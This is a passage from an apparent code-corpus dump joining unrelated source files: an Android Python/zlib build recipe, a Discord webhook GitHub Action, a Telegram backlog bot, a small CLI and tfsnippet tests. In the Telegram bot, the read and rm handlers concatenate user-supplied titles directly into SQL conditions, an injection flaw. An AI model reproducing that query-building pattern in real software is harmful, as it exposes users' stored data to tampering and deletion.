'git', 'rev-parse', '--short', 'HEAD'
], mode='result').strip()
self._version = f'3.9.0a0.r{rev_count}.{rev}'
return self._version
class Python(Package):
source = PythonSource()
patches = [
LocalPatch('cppflags'),
LocalPatch('skip-build'),
LocalPatch('lld-compatibility'),
]
dependencies = list(env.packages)
def init_build_env(self):
super().init_build_env()
self.env['CONFIG_SITE'] = self.filesdir / 'config.site'
ldflags = list(self.env['LDFLAGS'])
ldflags.pop(ldflags.index('-pie'))
self.env['LDFLAGS'] = list(ldflags)
def prepare(self):
self.run(['autoreconf', '--install', '--verbose', '--force'])
self.run_with_env([
'./configure',
'--prefix=/usr',
'--enable-shared',
'--host=' + target_arch().ANDROID_TARGET,
# CPython requires explicit --build
'--build=x86_64-linux-gnu',
'--disable-ipv6',
'--with-system-ffi',
'--with-system-expat',
'--without-ensurepip',
])
def build(self):
self.run(['make'])
self.run(['make', 'altinstall', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/zlib.py
```python
from ..source import URLSource
from ..package import Package
from ..patch import LocalPatch
from ..util import target_arch
class ZLib(Package):
version = '1.2.11'
source = URLSource(f'https://zlib.net/zlib-{version}.tar.gz', sig_suffix='.asc')
validpgpkeys = ['5ED46A6721D365587791E2AA783FCD8E58BCAFBA']
patches = [
LocalPatch('fix-ldflags'),
]
def init_build_env(self):
super().init_build_env()
self.env.update({
'CHOST': f'{target_arch().ANDROID_TARGET}-',
'CFLAGS': self.env['CPPFLAGS'] + self.env['CFLAGS'],
})
def prepare(self):
self.run_with_env([
'./configure',
'--prefix=/usr',
'--static',
])
def build(self):
self.run(['make'])
self.run(['make', 'install', f'DESTDIR={self.destdir()}'])
``` |
{
"source": "893091483/Discord-embed",
"score": 3
} |
#### File: Discord-embed/github_status_embed/types.py
```python
from __future__ import annotations
import collections
import dataclasses
import enum
import json
import logging
import typing
log = logging.getLogger(__name__)
MIN_EMBED_FIELD_LENGTH = 20
class MissingActionFile(FileNotFoundError):
"""Raised when the Action file can't be located."""
class InvalidArgument(TypeError):
"""Raised when an argument is of the wrong type."""
class MissingArgument(TypeError):
"""Raised when a required argument was missing from the inputs."""
def __init__(self, arg_name: str) -> None:
msg = "\n\n".join((
f"missing non-null value for argument `{arg_name}`",
"Hint: incorrect context paths like `github.non_existent` return `null` silently.",
))
super().__init__(msg)
class TypedDataclass:
"""Convert the dataclass arguments to the annotated types."""
optional = False
def __init__(self, *args, **kwargs):
raise NotImplementedError
@classmethod
def __init_subclass__(cls, optional: bool = False, **kwargs) -> None:
"""Keep track of whether or not this class is optional."""
super().__init_subclass__(**kwargs)
cls.optional = optional
@classmethod
def from_arguments(cls, arguments: typing.Dict[str, str]) -> typing.Optional[TypedDataclass]:
"""Convert the attributes to their annotated types."""
typed_attributes = typing.get_type_hints(cls)
# If we have an optional dataclass and none of the values were provided,
# return `None`. The reason is that optional classes should either be
# fully initialized, with all values, or not at all. If we observe at
# least one value, we assume that the intention was to provide them
# all.
if cls.optional and all(arguments.get(attr, "") == "" for attr in typed_attributes):
return None
# Extract and convert the keyword arguments needed for this data type.
kwargs = {}
for attribute, _type in typed_attributes.items():
value = arguments.pop(attribute, None)
# At this point, we should not have any missing arguments any more.
if value is None:
raise MissingArgument(attribute)
try:
if issubclass(_type, enum.Enum):
value = _type[value.upper()]
else:
value = _type(value)
                if isinstance(value, collections.abc.Sized) and len(value) == 0:
raise ValueError
except (ValueError, KeyError):
raise InvalidArgument(f"invalid value for `{attribute}`: {value}") from None
else:
kwargs[attribute] = value
return cls(**kwargs)
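# A minimal sketch of how `from_arguments` is meant to be used; the `Example`
# dataclass below is hypothetical and not part of this project:
#
#     @dataclasses.dataclass(frozen=True)
#     class Example(TypedDataclass):
#         count: int
#
#     Example.from_arguments({"count": "3"})  # -> Example(count=3)
#     Example.from_arguments({})              # -> raises MissingArgument("count")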
class WorkflowStatus(enum.Enum):
"""An Enum subclass that represents the workflow status."""
SUCCESS = {"verb": "succeeded", "adjective": "Successful", "color": 38912}
FAILURE = {"verb": "failed", "adjective": "Failed", "color": 16525609}
CANCELLED = {"verb": "was cancelled", "adjective": "Cancelled", "color": 6702148}
@property
def verb(self) -> str:
"""Return the verb associated with the status."""
return self.value["verb"]
@property
def color(self) -> int:
"""Return the color associated with the status."""
return self.value["color"]
@property
def adjective(self) -> str:
"""Return the adjective associated with the status."""
return self.value["adjective"]
@dataclasses.dataclass(frozen=True)
class Workflow(TypedDataclass):
"""A dataclass to hold information about the executed workflow."""
workflow_name: str
run_id: int
run_number: int
status: WorkflowStatus
repository: str
actor: str
ref: str
sha: str
@property
def name(self) -> str:
"""A convenience getter for the Workflow name."""
return self.workflow_name
@property
def id(self) -> int:
"""A convenience getter for the Workflow id."""
return self.run_id
@property
def number(self) -> int:
"""A convenience getter for the Workflow number."""
return self.run_number
@property
def url(self) -> str:
"""Get the url to the Workflow run result."""
return f"https://github.com/{self.repository}/actions/runs/{self.run_id}"
@property
def actor_url(self) -> str:
"""Get the url to the Workflow run result."""
return f"https://github.com/{self.actor}"
@property
def short_sha(self) -> str:
"""Return the short commit sha."""
return self.sha[:7]
@property
def commit_url(self) -> str:
"""Return the short commit sha."""
return f"https://github.com/{self.repository}/commit/{self.sha}"
@property
def repository_owner(self) -> str:
"""Extract and return the repository owner from the repository field."""
owner, _, _name = self.repository.partition("/")
return owner
@property
def repository_name(self) -> str:
"""Extract and return the repository owner from the repository field."""
_owner, _, name = self.repository.partition("/")
return name
@dataclasses.dataclass(frozen=True)
class Webhook(TypedDataclass):
"""A simple dataclass to hold information about the target webhook."""
webhook_token: str
@property
def id(self) -> int:
"""Return the snowflake ID of the webhook."""
return int(self.webhook_token.split("/")[5])
@property
def token(self) -> str:
"""Return the token of the webhook."""
return self.webhook_token.split("/")[6]
@property
def url(self) -> str:
"""Return the endpoint to execute this webhook."""
return f"https://canary.discord.com/api/webhooks/{self.id}/{self.token}"
@dataclasses.dataclass(frozen=True)
class PullRequest(TypedDataclass, optional=True):
"""
Dataclass to hold the PR-related arguments.
The attributes names are equal to argument names in the GitHub Actions
specification to allow for helpful error messages. To provide a convenient
public API, property getters were used with less redundant information in
the naming scheme.
"""
pr_author_login: str
pr_number: int
pr_title: str
pr_source: str
@classmethod
def from_payload(cls, arguments: typing.Dict[str, str]) -> typing.Optional[PullRequest]:
"""Create a Pull Request instance from Pull Request Payload JSON."""
# Safe load the JSON Payload provided as a command line argument.
raw_payload = arguments.pop('pull_request_payload').replace("\\", "\\\\")
log.debug(f"Attempting to parse PR Payload JSON: {raw_payload!r}.")
try:
payload = json.loads(raw_payload)
except json.JSONDecodeError:
log.debug("Failed to parse JSON, dropping down to empty payload")
payload = {}
else:
log.debug("Successfully parsed parsed payload")
# If the payload contains multiple PRs in a list, use the first one.
if isinstance(payload, list):
log.debug("The payload contained a list, extracting first PR.")
payload = payload[0] if payload else {}
if not payload:
log.warning("PR payload could not be parsed, attempting regular pr arguments.")
return cls.from_arguments(arguments)
# Get the target arguments from the payload, yielding similar results
# when keys are missing as to when their corresponding arguments are
# missing.
arguments["pr_author_login"] = payload.get('user', {}).get('login', '')
arguments["pr_number"] = payload.get('number', '')
arguments["pr_title"] = payload.get('title', '')
arguments["pr_source"] = payload.get('head', {}).get('label', '')
return cls.from_arguments(arguments)
@property
def author(self) -> str:
"""Return the `pr_author_login` field."""
return self.pr_author_login
@property
def author_url(self) -> str:
"""Return a URL for the author's profile."""
return f"https://github.com/{self.pr_author_login}"
@property
def number(self) -> int:
"""Return the `pr_number`."""
return self.pr_number
@property
def title(self) -> str:
"""Return the title of the PR."""
return self.pr_title
def shortened_source(self, length: int, owner: typing.Optional[str] = None) -> str:
"""Returned a shortened representation of the source branch."""
pr_source = self.pr_source
# This removes the owner prefix in the source field if it matches
# the current repository. This means that it will only be displayed
# when the PR is made from a branch on a fork.
if owner:
pr_source = pr_source.removeprefix(f"{owner}:")
# Truncate the `pr_source` if it's longer than the specified length
length = length if length >= MIN_EMBED_FIELD_LENGTH else MIN_EMBED_FIELD_LENGTH
if len(pr_source) > length:
stop = length - 3
pr_source = f"{pr_source[:stop]}..."
return pr_source
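# Example of the truncation above (illustrative only, assuming
# MIN_EMBED_FIELD_LENGTH does not raise the requested length of 12): with
# pr_source = "octocat:feature/very-long-branch-name" and owner = "octocat",
# the owner prefix is stripped first, then the remainder is cut to
# 12 - 3 = 9 characters plus "...", giving "feature/v...".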
@dataclasses.dataclass(frozen=True)
class Issue(TypedDataclass, optional=True):
"""
Dataclass to hold the Issue-related arguments.
The attribute names are equal to the argument names in the GitHub Actions
specification to allow for helpful error messages. To provide a convenient
public API, property getters were used with less redundant information in
the naming scheme.
"""
issue_author_login: str
issue_number: int
issue_title: str
issue_status: str
@classmethod
def from_payload(cls, arguments: typing.Dict[str, str]) -> typing.Optional[Issue]:
"""Create a issue instance and pop out pull_request_payload arguement."""
raw_payload = arguments.pop('pull_request_payload').replace("\\", "\\\\")
log.debug(f"Attempting to parse PR Payload JSON: {raw_payload!r}.")
try:
payload = json.loads(raw_payload)
except json.JSONDecodeError:
log.debug("Failed to parse JSON, dropping down to empty payload")
payload = {}
else:
log.debug("Successfully parsed parsed payload")
# If the payload contains multiple issues in a list, use the first one.
if isinstance(payload, list):
log.debug("The payload contained a list, extracting first Issue.")
payload = payload[0] if payload else {}
if not payload:
return cls.from_arguments(arguments)
# Get the target arguments from the payload, yielding similar results
# when keys are missing as to when their corresponding arguments are
# missing.
arguments["issue_author_login"] = payload.get('user', {}).get('login', '')
arguments["issue_number"] = payload.get('number', '')
arguments["issue_title"] = payload.get('title', '')
arguments["issue_status"] = payload.get('state', '')
return cls.from_arguments(arguments)
@property
def author(self) -> str:
"""Return the `issue_author_login` field."""
return self.issue_author_login
@property
def author_url(self) -> str:
"""Return a URL for the author's profile."""
return f"https://github.com/{self.issue_author_login}"
@property
def number(self) -> int:
"""Return the `pr_number`."""
return self.issue_number
@property
def title(self) -> str:
"""Return the title of the PR."""
return self.issue_title
@property
def status(self) -> str:
"""Return the title of the PR."""
return self.issue_status
class AllowedMentions(typing.TypedDict, total=False):
"""A TypedDict to represent the AllowedMentions in a webhook payload."""
parse: typing.List[str]
users: typing.List[str]
roles: typing.List[str]
replied_user: bool
class EmbedField(typing.TypedDict, total=False):
"""A TypedDict to represent an embed field in a webhook payload."""
name: str
value: str
inline: bool
class EmbedFooter(typing.TypedDict, total=False):
"""A TypedDict to represent an embed footer in a webhook payload."""
text: str
icon_url: str
proxy_icon_url: str
class EmbedThumbnail(typing.TypedDict, total=False):
"""A TypedDict to represent an embed thumbnail in a webhook payload."""
url: str
proxy_url: str
height: str
width: str
class EmbedProvider(typing.TypedDict, total=False):
"""A TypedDict to represent an embed provider in a webhook payload."""
name: str
url: str
class EmbedAuthor(typing.TypedDict, total=False):
"""A TypedDict to represent an embed author in a webhook payload."""
name: str
url: str
icon_url: str
proxy_icon_url: str
class EmbedVideo(typing.TypedDict, total=False):
"""A TypedDict to represent an embed video in a webhook payload."""
url: str
height: str
width: str
class EmbedImage(typing.TypedDict, total=False):
"""A TypedDict to represent an embed image in a webhook payload."""
url: str
proxy_url: str
height: str
width: str
class Embed(typing.TypedDict, total=False):
"""A TypedDict to represent an embed in a webhook payload."""
title: str
type: str
description: str
url: str
timestamp: str
color: int
footer: EmbedFooter
image: EmbedImage
thumbnail: EmbedThumbnail
video: EmbedVideo
provider: EmbedProvider
author: EmbedAuthor
fields: typing.List[EmbedField]
class WebhookPayload(typing.TypedDict, total=False):
"""A TypedDict to represent the webhook payload itself."""
content: str
username: str
avatar_url: str
tts: bool
file: bytes
embeds: typing.List[Embed]
payload_json: str
allowed_mentions: AllowedMentions
```
#### File: Discord-embed/github_status_embed/webhook.py
```python
import json
import logging
import typing
import requests
from github_status_embed import types
log = logging.getLogger(__name__)
EMBED_DESCRIPTION = "UCF Actions run [{run_id}]({run_url}) {status_verb}."
PULL_REQUEST_URL = "https://github.com/{repository}/pull/{number}"
ISSUE_URL = "https://github.com/{repository}/issues/{number}"
WEBHOOK_USERNAME = "UCF Actions"
WEBHOOK_AVATAR_URL = (
"https://raw.githubusercontent.com/"
"893091483/Discord-embed/main/"
"ucf-golden-knights-logo.png"
)
FIELD_CHARACTER_BUDGET = 60
def get_payload_pull_request(
workflow: types.Workflow, pull_request: types.PullRequest
) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a Pull Request."""
# Calculate the character budget for the Source Branch field
author = pull_request.pr_author_login
workflow_number = f"{workflow.name} #{workflow.number}"
characters_left = FIELD_CHARACTER_BUDGET - len(author) - len(workflow_number)
fields = [
types.EmbedField(
name="PR Author",
value=f"[{author}]({pull_request.author_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Source Branch",
value=f"[{pull_request.shortened_source(characters_left, owner=workflow.repository_owner)}](https://github.com/{workflow.repository}/tree/{pull_request.shortened_source(characters_left, owner=workflow.repository_owner)})",
inline=True,
),
]
embed = types.Embed(
title=(
f"New Pull Request: "
f"#{pull_request.number} {pull_request.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=PULL_REQUEST_URL.format(
repository=workflow.repository, number=pull_request.number
),
color="12388591",
fields=fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
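# Worked example of the character budget above (illustrative only): with
# FIELD_CHARACTER_BUDGET = 60, an author login of "octocat" (7 characters)
# and a workflow label "CI #42" (6 characters),
# characters_left = 60 - 7 - 6 = 47, so the Source Branch field is truncated
# to at most 47 characters by shortened_source().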
def get_payload_issue(
workflow: types.Workflow, issue: types.Issue
) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a Pull Request."""
# Calculate the character budget for the Source Branch field
print(type(issue))
author = issue.issue_author_login
workflow_number = f"{workflow.name} #{workflow.number}"
status = issue.issue_status
fields = [
types.EmbedField(
name="Issue Author",
value=f"[{author}]({issue.author_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Issue Status ",
value=f"[{status}]({workflow.url})",
inline=True,
),
]
if issue.issue_status == "open":
embed = types.Embed(
title=(
f"New Issue: "
f"#{issue.number} {issue.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=ISSUE_URL.format(
repository=workflow.repository, number=issue.number
),
color="10879022",
fields=fields,
)
else:
embed = types.Embed(
title=(
f"Closed Issue: "
f"#{issue.number} {issue.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=ISSUE_URL.format(
repository=workflow.repository, number=issue.number
),
color=workflow.status.color,
fields=fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
def get_payload(workflow: types.Workflow) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a generic Workflow run."""
embed_fields = [
types.EmbedField(
name="Actor",
value=f"[{workflow.actor}]({workflow.actor_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Commit",
value=f"[{workflow.short_sha}]({workflow.commit_url})",
inline=True,
),
]
embed = types.Embed(
title=(
f"New Commit by: "
f"{workflow.actor}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=workflow.url,
color="8381936",
fields=embed_fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
def send_webhook(
workflow: types.Workflow,
webhook: types.Webhook,
pull_request: typing.Optional[types.PullRequest],
issue: typing.Optional[types.Issue],
dry_run: bool = False,
) -> bool:
"""Send an embed to specified webhook."""
if issue is not None:
log.debug("Creating payload for Issue Check")
payload = get_payload_issue(workflow, issue)
elif pull_request is not None:
log.debug("Creating payload for Pull Request Check")
payload = get_payload_pull_request(workflow, pull_request)
else:
log.debug("Creating payload for non-Pull Request event")
payload = get_payload(workflow)
log.debug("Generated payload:\n%s", json.dumps(payload, indent=4))
if dry_run:
return True
response = requests.post(webhook.url, json=payload)
log.debug(f"Response: [{response.status_code}] {response.reason}")
if response.ok:
print(f"[status: {response.status_code}] Successfully delivered webhook payload!")
else:
# Output an error message using the GitHub Actions error command format
print(
"::error::Discord webhook delivery failed! "
f"(status: {response.status_code}; reason: {response.reason})"
)
return response.ok
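# Minimal usage sketch (illustrative, not part of the original module; the
# construction of `workflow` and `webhook` is assumed to happen elsewhere in
# the action's argument parsing):
#
#   ok = send_webhook(workflow, webhook, pull_request=None, issue=None,
#                     dry_run=True)
#
# With dry_run=True the generated payload is only logged and no HTTP request
# is sent to the Discord webhook endpoint.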
``` |
{
"source": "89453728/backlogbot",
"score": 2
} |
#### File: backlogbot/src/main.py
```python
from telegram.ext import (Updater,CommandHandler,MessageHandler,Filters)
from models.msg_handler import (message_handler)
from models.database import (get_all_by_col,put_in_table, rem_from_table, get_cols_by_col)
import urllib
DB = "backlog.db"
TABLE_NAME = "backlog"
# logs command
def logs(update,ctx):
chat_id = update.message.chat_id
logs = get_cols_by_col(DB,TABLE_NAME,["title"],"chat_id = "+str(chat_id),"order by title asc")
if logs==False:
ctx.bot.send_message(chat_id,"<b> Todavia no hay logs</b>",parse_mode="HTML")
else:
r = "<b>Logs existentes: </b>\n\n"
for i in logs:
r += "* " + i[0] + "\n"
ctx.bot.send_message(chat_id,r,parse_mode="HTML")
# read command
def read(update,ctx):
chat_id = update.message.chat_id
title = update.message.text.split(' ')
if len(title)!=2:
ctx.bot.send_message(chat_id,"El titulo no es valido, no debe tener espacios")
else :
title = title[1]
r = get_cols_by_col(DB,TABLE_NAME,['description'],"title = '" + title + "' AND chat_id = " + str(chat_id))
if r == False:
ctx.bot.send_message(chat_id,"<b>No se ha encontrado ningun log</b>",parse_mode="HTML")
elif len(r) == 1:
ctx.bot.send_message(chat_id,"<b>" + title + "</b>\n\n"+r[0][0],parse_mode="HTML")
else:
for i in range(0,len(r)):
ctx.bot.send_message(chat_id,"<b>" + title + "(" + str(i) + ")</b>\n\n"+ r[i][0],parse_mode="HTML")
# rm command
def rm(update,ctx):
chat_id = update.message.chat_id
title = update.message.text.split(' ')
if len(title)!=2:
ctx.bot.send_message(chat_id,"El titulo no es valido, no debe tener espacios")
else :
title = title[1]
r = get_all_by_col(DB,TABLE_NAME,"title = '" + title + "' AND chat_id = " + str(chat_id))
if len(r) == 0:
ctx.bot.send_message(chat_id,"El log " + title + " no existe")
else:
rem_from_table(DB,TABLE_NAME,"title = '"+title+"' AND chat_id = " + str(chat_id))
ctx.bot.send_message(chat_id,"El log " + title + " ha sido eliminado, /logs para ver los guardados")
# help command
def help(update,ctx):
ctx.bot.send_message( update.message.chat_id,("""<b>Comandos de backlog</b>\n<b>* help: </b>muestra este mensage\n<b>* hello: </b>te manda un saludo\n<b>* logs: </b>puedes ver todos los logs guardados\n<b>* rm 'log_name':</b> sirve para eliminar un log existente\n<b>* read 'titulo': </b>leer la descripcion de los logs con ese titulo\n\n<b>nota:</b> para añadir un log basta con enviar un mensaje con dos lineas, la primera con la palabra titulo seguido de : y luego el titulo que quieres darle, en la siguiente linea pones la descripcion (ojo! todo en una sola linea o el bot no lo detectara, no escribas saltos de linea (maximo 4096 caracteres el mensaje entero)"""),
parse_mode="HTML")
# hello command
def hello(update,ctx):
ctx.bot.send_message(update.message.chat_id,"Hi")
# message handler
def msg(update, ctx):
r = message_handler(update.message.text)
print(r)
if r:
put_in_table(DB,TABLE_NAME,['chat_id', 'title','description'],[update.message.chat_id,r[0],r[1]])
ctx.bot.send_message(update.message.chat_id,"<b> Log registrado con el nombre: " + r[0] + " </b>",parse_mode="HTML")
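# Illustrative note (inferred from the /help text above, not verified against
# models.msg_handler): a log is registered when a message has two lines, e.g.
#   titulo: compras
#   comprar leche y pan
# in which case message_handler is expected to return (title, description),
# and the pair is stored in the backlog table under this chat_id.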
def main():
# get token
try:
f = open("tok",'r')
except Exception as ex:
print("error opening tok file: ",ex)
exit(-1)
token = f.readline()
token = token[0:len(token)-1]
f.close()
# make the bot run
updater = Updater(token,use_context = True)
bot = updater.dispatcher
bot.add_handler(CommandHandler('hello',hello))
bot.add_handler(CommandHandler('logs',logs))
bot.add_handler(CommandHandler('help',help))
bot.add_handler(CommandHandler('read',read))
bot.add_handler(CommandHandler('rm',rm))
bot.add_handler(MessageHandler(Filters.text,callback=msg))
updater.start_polling()
updater.idle()
if __name__ == "__main__":
main()
``` |
{
"source": "89678yhub98r39sf/expresso",
"score": 3
} |
#### File: 89678yhub98r39sf/expresso/interface.py
```python
from expr_tree import *
def whilus_loopus():
while True:
q = input("Input your boolean string:\t")
e = ExprTree(q)
e.process()
if e.parsedEas == False:
print("Invalid string")
continue
while True:
c = input("Want Possible decisions? pd\t")
if c.lower() != "pd":
print("you want no decide then. bye.\n" * 100)
print("\n\n")
break
for k, v in e.possibleDecisions.items():
print("number {}\n{}\n".format(k, ExprTree.traversal_display(v, "partial")))
q = None
while True:
try:
q = int(input("* select the decision by number\n* of your interest, and you will receive choices:\t"))
break
except:
print("invalid number {}".format(q))
if q == None or q not in e.possibleDecisions:
print("invalid number {}".format(q))
continue
q = e.possibleDecisions[q]
q2 = ExprTree.decision_to_choice(q)
print("* Choice is :\n{}\n".format(ExprTree.traversal_display(q2)))
def main():
print("iqop program parses input boolean expression string")
whilus_loopus()
if __name__ == "__main__":
main()
``` |
{
"source": "897615138/tfsnippet-jill",
"score": 3
} |
#### File: tests/datasets/test_fashion_mnist.py
```python
import unittest
import numpy as np
import pytest
from tests.datasets.helper import skipUnlessRunDatasetsTests
from tfsnippet.datasets import *
class FashionMnistTestCase(unittest.TestCase):
@skipUnlessRunDatasetsTests()
def test_fetch_fashion_mnist(self):
# test normalize_x = False
(train_x, train_y), (test_x, test_y) = load_fashion_mnist()
self.assertTupleEqual(train_x.shape, (60000, 28, 28))
self.assertTupleEqual(train_y.shape, (60000,))
self.assertTupleEqual(test_x.shape, (10000, 28, 28))
self.assertTupleEqual(test_y.shape, (10000,))
self.assertGreater(np.max(train_x), 128.)
# test normalize_x = True
(train_x, train_y), (test_x, test_y) = \
load_fashion_mnist(normalize_x=True)
self.assertTupleEqual(train_x.shape, (60000, 28, 28))
self.assertTupleEqual(train_y.shape, (60000,))
self.assertTupleEqual(test_x.shape, (10000, 28, 28))
self.assertTupleEqual(test_y.shape, (10000,))
self.assertLess(np.max(train_x), 1. + 1e-5)
# test x_shape
(train_x, train_y), (test_x, test_y) = \
load_fashion_mnist(x_shape=(784,))
self.assertTupleEqual(train_x.shape, (60000, 784))
self.assertTupleEqual(test_x.shape, (10000, 784))
with pytest.raises(ValueError,
match='`x_shape` does not product to 784'):
_ = load_fashion_mnist(x_shape=(1, 2, 3))
```
#### File: tests/distributions/test_base.py
```python
import numpy as np
import tensorflow as tf
from tfsnippet.distributions import Distribution, reduce_group_ndims
class DistributionTestCase(tf.test.TestCase):
def test_basic(self):
class _Distribution(Distribution):
def log_prob(self, given, group_ndims=0, name=None):
return reduce_group_ndims(
tf.reduce_sum,
tf.convert_to_tensor(given) - 1.,
group_ndims
)
with self.test_session() as sess:
distrib = _Distribution(
dtype=tf.float32,
is_reparameterized=True,
is_continuous=True,
batch_shape=tf.constant([]),
batch_static_shape=tf.TensorShape([]),
value_ndims=0,
)
self.assertIs(distrib.base_distribution, distrib)
x = np.asarray([0., 1., 2.])
np.testing.assert_allclose(
sess.run(distrib.prob(x, group_ndims=0)),
np.exp(x - 1.)
)
np.testing.assert_allclose(
sess.run(distrib.prob(x, group_ndims=1)),
np.exp(np.sum(x - 1., -1))
)
```
#### File: tests/distributions/test_mixture.py
```python
import numpy as np
import pytest
import tensorflow as tf
from mock import Mock
from tfsnippet import Categorical, Normal, Mixture, OnehotCategorical
from tfsnippet.utils import set_random_seed
class MixtureTestCase(tf.test.TestCase):
def test_errors(self):
with pytest.raises(TypeError,
match='`categorical` must be a Categorical '
'distribution'):
_ = Mixture(Normal(0., 0.), [Normal(0., 0.)])
with pytest.raises(ValueError,
match='Dynamic `categorical.n_categories` is not '
'supported'):
_ = Mixture(Categorical(logits=tf.placeholder(tf.float32, [None])),
[Normal(0., 0.)])
with pytest.raises(ValueError, match='`components` must not be empty'):
_ = Mixture(Categorical(logits=tf.zeros([5])), [])
with pytest.raises(ValueError,
match=r'`len\(components\)` != `categorical.'
r'n_categories`: 1 vs 5'):
_ = Mixture(Categorical(logits=tf.zeros([5])), [Normal(0., 0.)])
with pytest.raises(ValueError,
match='`dtype` of the 1-th component does not '
'agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.int32),
Categorical(tf.zeros([2, 3]), dtype=tf.float32)])
with pytest.raises(ValueError,
match='`value_ndims` of the 1-th component does not '
'agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3])),
OnehotCategorical(tf.zeros([2, 3]))])
with pytest.raises(ValueError,
match='`is_continuous` of the 1-th component does '
'not agree with the first component'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.float32),
Normal(tf.zeros([2]), tf.zeros([2]))])
with pytest.raises(ValueError,
match='the 0-th component is not re-parameterized'):
_ = Mixture(Categorical(logits=tf.zeros([2])),
[Categorical(tf.zeros([2, 3]), dtype=tf.float32),
Normal(tf.zeros([2]), tf.zeros([2]))],
is_reparameterized=True)
with pytest.raises(RuntimeError,
match='.* is not re-parameterized'):
m = Mixture(
Categorical(logits=tf.zeros([2])),
[Normal(-1., 0.), Normal(1., 0.)]
)
_ = m.sample(1, is_reparameterized=True)
with pytest.raises(ValueError,
match='Batch shape of `categorical` does not '
'agree with the first component'):
_ = Mixture(
Categorical(logits=tf.zeros([1, 3, 2])),
[Normal(mean=tf.zeros([3]), logstd=0.),
Normal(mean=tf.zeros([3]), logstd=0.)]
)
with pytest.raises(ValueError,
match='Batch shape of the 1-th component does not '
'agree with the first component'):
_ = Mixture(
Categorical(logits=tf.zeros([3, 2])),
[Normal(mean=tf.zeros([3]), logstd=0.),
Normal(mean=tf.zeros([4]), logstd=0.)]
)
def do_check_mixture(self, component_factory, value_ndims, batch_shape,
is_continuous, dtype, logits_dtype,
is_reparameterized):
def make_distributions(n_samples, compute_density=False):
logits = np.random.normal(size=batch_shape + [3])
logits = logits.astype(logits_dtype)
categorical = Categorical(logits=logits)
components = [
component_factory(), component_factory(), component_factory()
]
cat_sample = categorical.sample(
n_samples, compute_density=compute_density)
c_samples = [c.sample(n_samples, compute_density=compute_density)
for c in components]
categorical.sample = Mock(return_value=cat_sample)
for c, c_sample in zip(components, c_samples):
c.sample = Mock(return_value=c_sample)
return categorical, components, cat_sample, c_samples
def check_sampling():
t = mixture.sample(n_samples)
out = sess.run([t, cat_sample] + list(c_samples))
m_sample, cat = out[:2]
component_samples = out[2:]
samples_stack = np.stack(component_samples, axis=-value_ndims - 1)
mask = np.eye(mixture.n_components, mixture.n_components)[cat]
mask = np.reshape(mask, mask.shape + (1,) * value_ndims)
ans = np.sum(mask * samples_stack, axis=-value_ndims - 1)
np.testing.assert_allclose(m_sample, ans)
def log_sum_exp(x, axis, keepdims=False):
x_max = np.max(x, axis=axis, keepdims=True)
ret = x_max + np.log(
np.sum(np.exp(x - x_max), axis=axis, keepdims=True))
if not keepdims:
ret = np.squeeze(ret, axis=axis)
return ret
def get_log_prob(t, group_ndims=0):
cat_log_probs = [
np.reshape(x, x.shape[:-1])
for x in np.split(
sess.run(tf.nn.log_softmax(categorical.logits)),
mixture.n_components,
axis=-1
)
]
c_log_probs = sess.run([c.log_prob(t) for c in components])
log_prob = log_sum_exp(
np.stack(
[cat + c for cat, c in zip(cat_log_probs, c_log_probs)],
axis=0
),
axis=0
)
if group_ndims > 0:
log_prob = np.sum(
log_prob,
axis=tuple(range(-group_ndims, 0))
)
return log_prob
def check_prob(group_ndims):
t = mixture.sample(n_samples)
t, log_prob, prob = sess.run([
t,
t.log_prob(group_ndims=group_ndims),
t.prob(group_ndims=group_ndims)
])
np.testing.assert_allclose(
get_log_prob(t, group_ndims), log_prob,
rtol=1e-5, atol=1e-6
)
np.testing.assert_allclose(
np.exp(get_log_prob(t, group_ndims)), prob,
rtol=1e-5, atol=1e-6
)
def check_sample_group_ndims(group_ndims, compute_density=None):
t = mixture.sample(n_samples, group_ndims=group_ndims,
compute_density=compute_density)
t, log_prob, prob = sess.run([t, t.log_prob(), t.prob()])
np.testing.assert_allclose(
get_log_prob(t, group_ndims), log_prob,
rtol=1e-5, atol=1e-6
)
np.testing.assert_allclose(
np.exp(get_log_prob(t, group_ndims)), prob,
rtol=1e-5, atol=1e-6
)
set_random_seed(1234)
with self.test_session() as sess:
n_samples = 11
categorical, components, cat_sample, c_samples = \
make_distributions(n_samples)
mixture = Mixture(categorical, components,
is_reparameterized=is_reparameterized)
self.assertIs(mixture.categorical, categorical)
self.assertTupleEqual(mixture.components, tuple(components))
self.assertEqual(mixture.n_components, 3)
self.assertEqual(mixture.dtype, dtype)
self.assertEqual(mixture.is_continuous, is_continuous)
self.assertEqual(mixture.is_reparameterized, is_reparameterized)
self.assertEqual(mixture.value_ndims, value_ndims)
check_sampling()
check_prob(0)
check_prob(1)
check_sample_group_ndims(0)
